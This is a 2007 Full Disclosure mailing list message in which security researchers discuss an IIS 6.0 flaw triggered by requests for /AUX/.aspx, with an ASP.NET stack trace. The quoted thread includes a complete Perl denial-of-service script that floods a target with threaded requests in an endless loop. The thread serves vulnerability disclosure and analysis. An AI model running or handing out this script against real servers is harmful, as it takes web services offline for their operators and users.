Full Disclosure mailing list archives

Re: Question Regarding IIS 6.0 / Is this a DoS???

From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Wed, 23 May 2007 14:20:53 +0400

Dear kingcope,

With debugging it looks quite harmless:

Server Error in '/' Application.
--------------------------------------------------------------------------------

Directory '\\.\aux' does not exist. Failed to start monitoring file changes. 
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack 
trace for more information about the error and where it originated in the code. 

Exception Details: System.Web.HttpException: Directory '\\.\aux' does not exist. Failed to start monitoring file 
changes.

Source Error: 

An unhandled exception was generated during the execution of the current web request. Information regarding the origin 
and location of the exception can be identified using the exception stack trace below.  

Stack Trace: 


[HttpException (0x80070002): Directory '\\.\aux' does not exist. Failed to start monitoring file changes.]
   System.Web.FileChangesMonitor.FindDirectoryMonitor(String dir, Boolean addIfNotFound, Boolean throwOnError) +527
   System.Web.FileChangesMonitor.StartMonitoringPath(String alias, FileChangeEventHandler callback) +477
   System.Web.Caching.CacheDependency.Init(Boolean isPublic, Boolean isSensitive, String[] filenamesArg, String[] 
cachekeysArg, CacheDependency dependency, DateTime utcStart) +1535
   System.Web.Caching.CacheDependency..ctor(Boolean isSensitive, String[] filenames, DateTime utcStart) +50
   System.Web.Configuration.HttpConfigurationSystem.GetCacheDependencies(Hashtable cachedeps, DateTime utcStart) +151
   System.Web.Configuration.HttpConfigurationSystem.ComposeConfig(String reqPath, IHttpMapPath configmap) +760
   System.Web.HttpContext.GetCompleteConfigRecord(String reqpath, IHttpMapPath configmap) +434
   System.Web.HttpContext.GetCompleteConfig() +49
   System.Web.HttpContext.GetConfig(String name) +195
   System.Web.CustomErrors.GetSettings(HttpContext context, Boolean canThrow) +20
   System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow) +39
   System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e) +486

 


--------------------------------------------------------------------------------
Version Information: Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET Version:1.1.4322.2032 

--Wednesday, May 23, 2007, 1:35:17 PM, you wrote to kingcope () gmx net:

k> Btw,
k> Here is a screenshot of the effect.


k> -----Original Message-----
k> From: kingcope [mailto:kingcope () gmx net] 
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; 'bugtraq () securityfocus com'
k> Subject: RE: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -----Original Message-----
k> From: 3APA3A [mailto:3APA3A () SECURITY NNOV RU] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; bugtraq () securityfocus com
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's  vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application

from accessing this port (or LPT), because access to ports is exclusive.


k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure () lists grok org uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some
k> servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to a IIS 6.0 server
k> requesting
k>> #/AUX/.aspx the server gets instable and non responsive. This happens
k> only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope kingcope () gmx net
k>>
k> ##########################################################################
k>>
k> ###***********************************************************************
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this from a Linux system
k>>
k> ##########################################################################

k>> use IO::Socket;
k>> use threads;

k>> if ($ARGV[0] eq "") { exit; }
k>> my $host = $ARGV[0];

k>> $|=1;

k>> sub sendit {
k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                               PeerPort => 'http(80)',
k>>                               Proto    => 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";
k>> }

k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                               PeerPort => 'http(80)',
k>>                               Proto    => 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";

k>> $k=0;
k>> while (<$sock>) {
k>>     if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>>                     $k=1;
k>>                     last;
k>>     }
k>> }

k>> if ($k==0) {
k>>     print "Server does not seem vulnerable to this attack.\n";
k>>     exit;   
k>> }

k>> print "ATTACK!\n";

k>> while(1){

k>> for (my $i=0;$i<=100;$i++) {
k>>     $thr = threads->new(\&sendit);
k>>     print "\r\r\r$i/100                        ";
k>> }

k>> foreach $thr (threads->list) {
k>>     $thr->join;
k>> }
k>> }


k>> _______________________________________________
k>> Full-Disclosure - We believe in it.
k>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k>> Hosted and sponsored by Secunia - http://secunia.com/




-- 
~/ZARAZA http://securityvulns.com/
Ну а теперь, Уильям, хорошенько поразмыслите над данным письмом. (Твен)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 21)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Stan Bubrouski (May 22)
  - Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 22)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
  - Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)
    - Re: Question Regarding IIS 6.0 / Is this a DoS??? Michael Silk (May 23)
    - Re: Question Regarding IIS 6.0 / Is this a DoS??? Richard Moore (May 23)
    - Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
  - Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)
- <Possible follow-ups>
- Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
  - Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)